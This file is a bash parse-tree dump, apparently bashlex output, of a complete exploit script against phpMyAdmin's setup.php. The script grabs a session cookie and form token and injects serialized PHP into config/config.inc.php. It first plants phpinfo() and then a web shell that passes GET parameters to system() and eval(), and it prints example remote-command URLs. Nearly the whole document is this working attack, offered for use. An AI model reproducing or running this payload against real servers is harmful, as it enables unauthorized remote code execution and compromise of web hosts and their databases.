CompoundNode(lineno=32, list=[
  IfNode(lineno=32, pos=(1225, 1369), parts=[
    ReservedwordNode(lineno=27, pos=(1225, 1227), word='if'),
    CommandNode(lineno=27, pos=(1228, 1240), parts=[
      WordNode(lineno=27, pos=(1228, 1229), word='['),
      WordNode(lineno=27, pos=(1230, 1232), word='$#', parts=[
        ParameterNode(lineno=27, pos=(1230, 1232), value='#'),
      ]),
      WordNode(lineno=27, pos=(1233, 1236), word='-ne'),
      WordNode(lineno=27, pos=(1237, 1238), word='1'),
      WordNode(lineno=27, pos=(1239, 1240), word=']'),
    ]),
    ReservedwordNode(lineno=28, pos=(1241, 1245), word='then'),
    ListNode(lineno=32, pos=(1247, 1367), parts=[
        CommandNode(lineno=29, pos=(1247, 1299), parts=[
          WordNode(lineno=29, pos=(1247, 1251), word='echo'),
          WordNode(lineno=29, pos=(1252, 1299), word='usage: ./$(basename $0) <phpMyAdmin_base_URL>', parts=[
            CommandsubstitutionNode(command=
              CommandNode(lineno=27, pos=(1264, 1275), parts=[
                WordNode(lineno=27, pos=(1264, 1272), word='basename'),
                WordNode(lineno=27, pos=(1273, 1275), word='$0', parts=[
                  ParameterNode(lineno=27, pos=(1273, 1275), value='0'),
                ]),
              ]), lineno=27, pos=(1262, 1276)),
          ]),
        ]),
        OperatorNode(lineno=30, op='\n', pos=(1299, 1300)),
        CommandNode(lineno=30, pos=(1301, 1360), parts=[
          WordNode(lineno=30, pos=(1301, 1305), word='echo'),
          WordNode(lineno=30, pos=(1306, 1360), word='i.e.: ./$(basename $0) http://target.tld/phpMyAdmin/', parts=[
            CommandsubstitutionNode(command=
              CommandNode(lineno=27, pos=(1317, 1328), parts=[
                WordNode(lineno=27, pos=(1317, 1325), word='basename'),
                WordNode(lineno=27, pos=(1326, 1328), word='$0', parts=[
                  ParameterNode(lineno=27, pos=(1326, 1328), value='0'),
                ]),
              ]), lineno=27, pos=(1315, 1329)),
          ]),
        ]),
        OperatorNode(lineno=31, op='\n', pos=(1360, 1361)),
        CommandNode(lineno=31, pos=(1362, 1366), parts=[
          WordNode(lineno=31, pos=(1362, 1366), word='exit'),
        ]),
        OperatorNode(lineno=32, op='\n', pos=(1366, 1367)),
      ]),
    ReservedwordNode(lineno=32, pos=(1367, 1369), word='fi'),
  ]),
], pos=(1225, 1369))
CompoundNode(lineno=39, list=[
  IfNode(lineno=39, pos=(1371, 1534), parts=[
    ReservedwordNode(lineno=34, pos=(1371, 1373), word='if'),
    PipelineNode(lineno=33, pos=(1374, 1397), parts=[
      ReservedwordNode(lineno=34, pos=(1374, 1375), word='!'),
      CommandNode(lineno=34, pos=(1376, 1397), parts=[
        WordNode(lineno=34, pos=(1376, 1381), word='which'),
        WordNode(lineno=34, pos=(1382, 1386), word='curl'),
        RedirectNode(lineno=34, output=
          WordNode(lineno=34, pos=(1388, 1397), word='/dev/null'), pos=(1387, 1397), type='>'),
      ]),
    ]),
    ReservedwordNode(lineno=35, pos=(1398, 1402), word='then'),
    ListNode(lineno=39, pos=(1404, 1532), parts=[
        CommandNode(lineno=36, pos=(1404, 1459), parts=[
          WordNode(lineno=36, pos=(1404, 1408), word='echo'),
          WordNode(lineno=36, pos=(1409, 1459), word='sorry but you need curl for this script to work!'),
        ]),
        OperatorNode(lineno=37, op='\n', pos=(1459, 1460)),
        CommandNode(lineno=37, pos=(1468, 1518), parts=[
          WordNode(lineno=37, pos=(1468, 1472), word='echo'),
          WordNode(lineno=37, pos=(1473, 1518), word='on Debian/Ubuntu: sudo apt-get install curl'),
        ]),
        OperatorNode(lineno=38, op='\n', pos=(1518, 1519)),
        CommandNode(lineno=38, pos=(1527, 1531), parts=[
          WordNode(lineno=38, pos=(1527, 1531), word='exit'),
        ]),
        OperatorNode(lineno=39, op='\n', pos=(1531, 1532)),
      ]),
    ReservedwordNode(lineno=39, pos=(1532, 1534), word='fi'),
  ]),
], pos=(1371, 1534))
FunctionNode(lineno=81, pos=(1537, 3405), parts=[
  ReservedwordNode(lineno=42, pos=(1537, 1545), word='function'),
  WordNode(lineno=42, pos=(1546, 1553), word='exploit'),
  CompoundNode(lineno=81, list=[
    ReservedwordNode(lineno=42, pos=(1554, 1555), word='{'),
    ListNode(lineno=81, pos=(1557, 3404), parts=[
        CommandNode(lineno=49, pos=(1557, 1940), parts=[
          AssignmentNode(lineno=49, pos=(1557, 1940), word='postdata=token=$1&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:23:%22host%27]=%27%27%3b%20phpinfo%28%29%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix', parts=[
            ParameterNode(lineno=49, pos=(1573, 1575), value='1'),
          ]),
        ]),
        OperatorNode(lineno=50, op='\n', pos=(1940, 1941)),
        CommandNode(lineno=60, pos=(1942, 2542), parts=[
          WordNode(lineno=60, pos=(1942, 2542), word='postdata2=token=$1&action=save&configuration=a:1:{s:7:%22Servers%22%3ba:1:{i:0%3ba:6:{s:136:%22host%27%5d=%27%27%3b%20if($_GET%5b%27c%27%5d){echo%20%27%3cpre%3e%27%3bsystem($_GET%5b%27c%27%5d)%3becho%20%27%3c/pre%3e%27%3b}if($_GET%5b%27p%27%5d){echo%20%27%3cpre%3e%27%3beval($_GET%5b%27p%27%5d)%3becho%20%27%3c/pre%3e%27%3b}%3b//%22%3bs:9:%22localhost%22%3bs:9:%22extension%22%3bs:6:%22mysqli%22%3bs:12:%22connect_type%22%3bs:3:%22tcp%22%3bs:8:%22compress%22%3bb:0%3bs:9:%22auth_type%22%3bs:6:%22config%22%3bs:4:%22user%22%3bs:4:%22root%22%3b}}}&eoltype=unix', parts=[
            ParameterNode(lineno=60, pos=(1959, 1961), value='1'),
          ]),
        ]),
        OperatorNode(lineno=61, op='\n', pos=(2542, 2543)),
        CommandNode(lineno=62, pos=(2545, 2597), parts=[
          AssignmentNode(lineno=62, pos=(2545, 2597), word='flag=/tmp/$(basename $0).$RANDOM.phpinfo.flag.html', parts=[
            CommandsubstitutionNode(command=
              CommandNode(lineno=42, pos=(2558, 2569), parts=[
                WordNode(lineno=42, pos=(2558, 2566), word='basename'),
                WordNode(lineno=42, pos=(2567, 2569), word='$0', parts=[
                  ParameterNode(lineno=42, pos=(2567, 2569), value='0'),
                ]),
              ]), lineno=42, pos=(2556, 2570)),
            ParameterNode(lineno=62, pos=(2571, 2578), value='RANDOM'),
          ]),
        ]),
        OperatorNode(lineno=63, op='\n', pos=(2597, 2598)),
        CommandNode(lineno=64, pos=(2601, 2646), parts=[
          WordNode(lineno=64, pos=(2601, 2605), word='echo'),
          WordNode(lineno=64, pos=(2606, 2646), word='[+] attempting to inject phpinfo() ...'),
        ]),
        OperatorNode(lineno=65, op='\n', pos=(2646, 2647)),
        CommandNode(lineno=65, pos=(2648, 2717), parts=[
          WordNode(lineno=65, pos=(2648, 2652), word='curl'),
          WordNode(lineno=65, pos=(2653, 2656), word='-ks'),
          WordNode(lineno=65, pos=(2657, 2659), word='-b'),
          WordNode(lineno=65, pos=(2660, 2662), word='$2', parts=[
            ParameterNode(lineno=65, pos=(2660, 2662), value='2'),
          ]),
          WordNode(lineno=65, pos=(2663, 2665), word='-d'),
          WordNode(lineno=65, pos=(2666, 2677), word='$postdata', parts=[
            ParameterNode(lineno=65, pos=(2667, 2676), value='postdata'),
          ]),
          WordNode(lineno=65, pos=(2678, 2683), word='--url'),
          WordNode(lineno=65, pos=(2684, 2706), word='$3/scripts/setup.php', parts=[
            ParameterNode(lineno=65, pos=(2685, 2687), value='3'),
          ]),
          RedirectNode(lineno=65, output=
            WordNode(lineno=65, pos=(2708, 2717), word='/dev/null'), pos=(2707, 2717), type='>'),
        ]),
        OperatorNode(lineno=66, op='\n', pos=(2717, 2718)),
        CompoundNode(lineno=80, list=[
          IfNode(lineno=80, pos=(2720, 3403), parts=[
            ReservedwordNode(lineno=67, pos=(2720, 2722), word='if'),
            PipelineNode(lineno=67, pos=(2723, 2794), parts=[
              CommandNode(lineno=67, pos=(2723, 2764), parts=[
                WordNode(lineno=67, pos=(2723, 2727), word='curl'),
                WordNode(lineno=67, pos=(2728, 2731), word='-ks'),
                WordNode(lineno=67, pos=(2732, 2737), word='--url'),
                WordNode(lineno=67, pos=(2738, 2764), word='$3/config/config.inc.php', parts=[
                  ParameterNode(lineno=67, pos=(2739, 2741), value='3'),
                ]),
              ]),
              PipeNode(lineno=67, pipe='|', pos=(2765, 2766)),
              CommandNode(lineno=67, pos=(2767, 2794), parts=[
                WordNode(lineno=67, pos=(2767, 2771), word='grep'),
                WordNode(lineno=67, pos=(2772, 2783), word='phpinfo()'),
                RedirectNode(lineno=67, output=
                  WordNode(lineno=67, pos=(2785, 2794), word='/dev/null'), pos=(2784, 2794), type='>'),
              ]),
            ]),
            ReservedwordNode(lineno=68, pos=(2796, 2800), word='then'),
            ListNode(lineno=77, pos=(2803, 3325), parts=[
                CommandNode(lineno=69, pos=(2803, 2851), parts=[
                  WordNode(lineno=69, pos=(2803, 2807), word='curl'),
                  WordNode(lineno=69, pos=(2808, 2811), word='-ks'),
                  WordNode(lineno=69, pos=(2812, 2817), word='--url'),
                  WordNode(lineno=69, pos=(2818, 2844), word='$3/config/config.inc.php', parts=[
                    ParameterNode(lineno=69, pos=(2819, 2821), value='3'),
                  ]),
                  RedirectNode(lineno=69, output=
                    WordNode(discard=True, lineno=69, pos=(2846, 2851), word='$flag', parts=[
                      ParameterNode(lineno=69, pos=(2846, 2851), value='flag'),
                    ]), pos=(2845, 2851), type='>'),
                ]),
                OperatorNode(lineno=70, op='\n', pos=(2852, 2853)),
                CommandNode(lineno=70, pos=(2855, 2929), parts=[
                  WordNode(discard=True, lineno=70, pos=(2855, 2859), word='echo'),
                  WordNode(discard=True, lineno=70, pos=(2860, 2929), word='[+] success! phpinfo() injected successfully! output saved on $flag', parts=[
                    ParameterNode(lineno=70, pos=(2923, 2928), value='flag'),
                  ]),
                ]),
                OperatorNode(lineno=71, op='\n', pos=(2929, 2930)),
                CommandNode(lineno=71, pos=(2932, 3000), parts=[
                  WordNode(discard=True, lineno=71, pos=(2932, 2936), word='curl'),
                  WordNode(discard=True, lineno=71, pos=(2937, 2940), word='-ks'),
                  WordNode(discard=True, lineno=71, pos=(2941, 2943), word='-b'),
                  WordNode(discard=True, lineno=71, pos=(2944, 2946), word='$2', parts=[
                    ParameterNode(lineno=71, pos=(2944, 2946), value='2'),
                  ]),
                  WordNode(discard=True, lineno=71, pos=(2947, 2949), word='-d'),
                  WordNode(discard=True, lineno=71, pos=(2950, 2960), word='$postdata2', parts=[
                    ParameterNode(lineno=71, pos=(2950, 2960), value='postdata2'),
                  ]),
                  WordNode(discard=True, lineno=71, pos=(2961, 2966), word='--url'),
                  WordNode(discard=True, lineno=71, pos=(2967, 2989), word='$3/scripts/setup.php', parts=[
                    ParameterNode(lineno=71, pos=(2968, 2970), value='3'),
                  ]),
                  RedirectNode(lineno=71, output=
                    WordNode(discard=True, lineno=71, pos=(2991, 3000), word='/dev/null'), pos=(2990, 3000), type='>'),
                ]),
                OperatorNode(lineno=72, op='\n', pos=(3000, 3001)),
                CommandNode(lineno=72, pos=(3003, 3108), parts=[
                  WordNode(discard=True, lineno=72, pos=(3003, 3007), word='echo'),
                  WordNode(discard=True, lineno=72, pos=(3008, 3108), word='[+] you *should* now be able to remotely run shell commands and PHP code using your browser. i.e.:'),
                ]),
                OperatorNode(lineno=73, op='\n', pos=(3108, 3109)),
                CommandNode(lineno=73, pos=(3111, 3156), parts=[
                  WordNode(discard=True, lineno=73, pos=(3111, 3115), word='echo'),
                  WordNode(discard=True, lineno=73, pos=(3116, 3156), word='    $3/config/config.inc.php?c=ls+-l+/', parts=[
                    ParameterNode(lineno=73, pos=(3121, 3123), value='3'),
                  ]),
                ]),
                OperatorNode(lineno=74, op='\n', pos=(3156, 3157)),
                CommandNode(lineno=74, pos=(3159, 3207), parts=[
                  WordNode(discard=True, lineno=74, pos=(3159, 3163), word='echo'),
                  WordNode(discard=True, lineno=74, pos=(3164, 3207), word='    $3/config/config.inc.php?p=phpinfo();', parts=[
                    ParameterNode(lineno=74, pos=(3169, 3171), value='3'),
                  ]),
                ]),
                OperatorNode(lineno=75, op='\n', pos=(3207, 3208)),
                CommandNode(lineno=76, pos=(3210, 3324), parts=[
                  WordNode(discard=True, lineno=75, pos=(3210, 3214), word='echo'),
                  WordNode(discard=True, lineno=76, pos=(3215, 3279), word='    please send any feedback/improvements for this script to'),
                  WordNode(discard=True, lineno=76, pos=(3281, 3324), word='unknown.pentester<AT_sign__here>gmail.com'),
                ]),
                OperatorNode(lineno=77, op='\n', pos=(3324, 3325)),
              ]),
            ReservedwordNode(lineno=77, pos=(3326, 3330), word='else'),
            ListNode(lineno=80, pos=(3333, 3400), parts=[
                CommandNode(lineno=78, pos=(3333, 3392), parts=[
                  WordNode(discard=True, lineno=78, pos=(3333, 3337), word='echo'),
                  WordNode(discard=True, lineno=78, pos=(3338, 3392), word='[+] no luck injecting to $3/config/config.inc.php :(', parts=[
                    ParameterNode(lineno=78, pos=(3364, 3366), value='3'),
                  ]),
                ]),
                OperatorNode(lineno=79, op='\n', pos=(3392, 3393)),
                CommandNode(lineno=79, pos=(3395, 3399), parts=[
                  WordNode(discard=True, lineno=79, pos=(3395, 3399), word='exit'),
                ]),
                OperatorNode(lineno=80, op='\n', pos=(3399, 3400)),
              ]),
            ReservedwordNode(lineno=80, pos=(3401, 3403), word='fi'),
          ]),
        ], pos=(2720, 3403)),
        OperatorNode(lineno=81, op='\n', pos=(3403, 3404)),
      ]),
    ReservedwordNode(lineno=81, pos=(3404, 3405), word='}'),
  ], pos=(1554, 3405)),
])
CommandNode(lineno=84, pos=(3433, 3476), parts=[
  AssignmentNode(lineno=84, pos=(3433, 3476), word='cookiejar=/tmp/$(basename $0).$RANDOM.txt', parts=[
    CommandsubstitutionNode(command=
      CommandNode(lineno=84, pos=(3451, 3462), parts=[
        WordNode(lineno=84, pos=(3451, 3459), word='basename'),
        WordNode(lineno=84, pos=(3460, 3462), word='$0', parts=[
          ParameterNode(lineno=84, pos=(3460, 3462), value='0'),
        ]),
      ]), lineno=84, pos=(3449, 3463)),
    ParameterNode(lineno=84, pos=(3464, 3471), value='RANDOM'),
  ]),
])
CommandNode(lineno=85, pos=(3477, 3583), parts=[
  AssignmentNode(lineno=85, pos=(3477, 3583), word='token=`curl -ks -c $cookiejar --url "$1/scripts/setup.php" | grep \\"token\\" | head -n 1 | cut -d \\" -f 12`', parts=[
    CommandsubstitutionNode(command=
      PipelineNode(lineno=85, pos=(3484, 3582), parts=[
        CommandNode(lineno=85, pos=(3484, 3535), parts=[
          WordNode(lineno=85, pos=(3484, 3488), word='curl'),
          WordNode(lineno=85, pos=(3489, 3492), word='-ks'),
          WordNode(lineno=85, pos=(3493, 3495), word='-c'),
          WordNode(lineno=85, pos=(3496, 3506), word='$cookiejar', parts=[
            ParameterNode(lineno=85, pos=(3496, 3506), value='cookiejar'),
          ]),
          WordNode(lineno=85, pos=(3507, 3512), word='--url'),
          WordNode(lineno=85, pos=(3513, 3535), word='$1/scripts/setup.php', parts=[
            ParameterNode(lineno=85, pos=(3514, 3516), value='1'),
          ]),
        ]),
        PipeNode(lineno=85, pipe='|', pos=(3536, 3537)),
        CommandNode(lineno=85, pos=(3538, 3552), parts=[
          WordNode(lineno=85, pos=(3538, 3542), word='grep'),
          WordNode(lineno=85, pos=(3543, 3552), word='"token"'),
        ]),
        PipeNode(lineno=85, pipe='|', pos=(3553, 3554)),
        CommandNode(lineno=85, pos=(3555, 3564), parts=[
          WordNode(lineno=85, pos=(3555, 3559), word='head'),
          WordNode(lineno=85, pos=(3560, 3562), word='-n'),
          WordNode(lineno=85, pos=(3563, 3564), word='1'),
        ]),
        PipeNode(lineno=85, pipe='|', pos=(3565, 3566)),
        CommandNode(lineno=85, pos=(3567, 3582), parts=[
          WordNode(lineno=85, pos=(3567, 3570), word='cut'),
          WordNode(lineno=85, pos=(3571, 3573), word='-d'),
          WordNode(lineno=85, pos=(3574, 3576), word='"'),
          WordNode(lineno=85, pos=(3577, 3579), word='-f'),
          WordNode(lineno=85, pos=(3580, 3582), word='12'),
        ]),
      ]), lineno=85, pos=(3483, 3583)),
  ]),
])
CommandNode(lineno=86, pos=(3584, 3644), parts=[
  WordNode(lineno=86, pos=(3584, 3588), word='echo'),
  WordNode(lineno=86, pos=(3589, 3644), word='[+] checking if phpMyAdmin exists on URL provided ...'),
])
CompoundNode(lineno=106, list=[
  IfNode(lineno=106, pos=(3701, 4189), parts=[
    ReservedwordNode(lineno=89, pos=(3701, 3703), word='if'),
    CommandNode(lineno=89, pos=(3704, 3742), parts=[
      WordNode(lineno=89, pos=(3704, 3708), word='grep'),
      WordNode(lineno=89, pos=(3709, 3719), word='phpMyAdmin'),
      WordNode(lineno=89, pos=(3720, 3730), word='$cookiejar', parts=[
        ParameterNode(lineno=89, pos=(3720, 3730), value='cookiejar'),
      ]),
      RedirectNode(lineno=89, output=
        WordNode(lineno=89, pos=(3733, 3742), word='/dev/null'), pos=(3731, 3742), type='&>'),
    ]),
    ReservedwordNode(lineno=90, pos=(3743, 3747), word='then'),
    ListNode(lineno=103, pos=(3749, 4079), parts=[
        CommandNode(lineno=91, pos=(3749, 3780), parts=[
          AssignmentNode(lineno=91, pos=(3749, 3780), word='length=`echo -n $token | wc -c`', parts=[
            CommandsubstitutionNode(command=
              PipelineNode(lineno=91, pos=(3757, 3779), parts=[
                CommandNode(lineno=91, pos=(3757, 3771), parts=[
                  WordNode(lineno=91, pos=(3757, 3761), word='echo'),
                  WordNode(lineno=91, pos=(3762, 3764), word='-n'),
                  WordNode(lineno=91, pos=(3765, 3771), word='$token', parts=[
                    ParameterNode(lineno=91, pos=(3765, 3771), value='token'),
                  ]),
                ]),
                PipeNode(lineno=91, pipe='|', pos=(3772, 3773)),
                CommandNode(lineno=91, pos=(3774, 3779), parts=[
                  WordNode(lineno=91, pos=(3774, 3776), word='wc'),
                  WordNode(lineno=91, pos=(3777, 3779), word='-c'),
                ]),
              ]), lineno=91, pos=(3756, 3780)),
          ]),
        ]),
        OperatorNode(lineno=92, op='\n', pos=(3780, 3781)),
        CompoundNode(lineno=102, list=[
          IfNode(lineno=102, pos=(3813, 4078), parts=[
            ReservedwordNode(lineno=94, pos=(3813, 3815), word='if'),
            CommandNode(lineno=94, pos=(3816, 3834), parts=[
              WordNode(lineno=94, pos=(3816, 3817), word='['),
              WordNode(lineno=94, pos=(3818, 3825), word='$length', parts=[
                ParameterNode(lineno=94, pos=(3818, 3825), value='length'),
              ]),
              WordNode(lineno=94, pos=(3826, 3829), word='-eq'),
              WordNode(lineno=94, pos=(3830, 3832), word='32'),
              WordNode(lineno=94, pos=(3833, 3834), word=']'),
            ]),
            ReservedwordNode(lineno=95, pos=(3836, 3840), word='then'),
            ListNode(lineno=99, pos=(3843, 3968), parts=[
                CommandNode(lineno=96, pos=(3843, 3915), parts=[
                  WordNode(lineno=96, pos=(3843, 3847), word='echo'),
                  WordNode(lineno=96, pos=(3848, 3915), word='[+] phpMyAdmin cookie and form token received successfully. Good!'),
                ]),
                OperatorNode(lineno=97, op='\n', pos=(3915, 3916)),
                CommandNode(lineno=98, pos=(3939, 3967), parts=[
                  WordNode(lineno=98, pos=(3939, 3946), word='exploit'),
                  WordNode(lineno=98, pos=(3947, 3953), word='$token', parts=[
                    ParameterNode(lineno=98, pos=(3947, 3953), value='token'),
                  ]),
                  WordNode(lineno=98, pos=(3954, 3964), word='$cookiejar', parts=[
                    ParameterNode(lineno=98, pos=(3954, 3964), value='cookiejar'),
                  ]),
                  WordNode(lineno=98, pos=(3965, 3967), word='$1', parts=[
                    ParameterNode(lineno=98, pos=(3965, 3967), value='1'),
                  ]),
                ]),
                OperatorNode(lineno=99, op='\n', pos=(3967, 3968)),
              ]),
            ReservedwordNode(lineno=99, pos=(3969, 3973), word='else'),
            ListNode(lineno=102, pos=(3976, 4075), parts=[
                CommandNode(lineno=100, pos=(3976, 4067), parts=[
                  WordNode(lineno=100, pos=(3976, 3980), word='echo'),
                  WordNode(lineno=100, pos=(3981, 4067), word='[+] could not grab form token. you might want to try exploiting the vuln manually :('),
                ]),
                OperatorNode(lineno=101, op='\n', pos=(4067, 4068)),
                CommandNode(lineno=101, pos=(4070, 4074), parts=[
                  WordNode(lineno=101, pos=(4070, 4074), word='exit'),
                ]),
                OperatorNode(lineno=102, op='\n', pos=(4074, 4075)),
              ]),
            ReservedwordNode(lineno=102, pos=(4076, 4078), word='fi'),
          ]),
        ], pos=(3813, 4078)),
        OperatorNode(lineno=103, op='\n', pos=(4078, 4079)),
      ]),
    ReservedwordNode(lineno=103, pos=(4079, 4083), word='else'),
    ListNode(lineno=106, pos=(4085, 4187), parts=[
        CommandNode(lineno=104, pos=(4085, 4180), parts=[
          WordNode(lineno=104, pos=(4085, 4089), word='echo'),
          WordNode(lineno=104, pos=(4090, 4180), word='[+] phpMyAdmin NOT found! phpMyAdmin base URL incorrectly typed? wrong case-sensitivity?'),
        ]),
        OperatorNode(lineno=105, op='\n', pos=(4180, 4181)),
        CommandNode(lineno=105, pos=(4182, 4186), parts=[
          WordNode(lineno=105, pos=(4182, 4186), word='exit'),
        ]),
        OperatorNode(lineno=106, op='\n', pos=(4186, 4187)),
      ]),
    ReservedwordNode(lineno=106, pos=(4187, 4189), word='fi'),
  ]),
], pos=(3701, 4189))
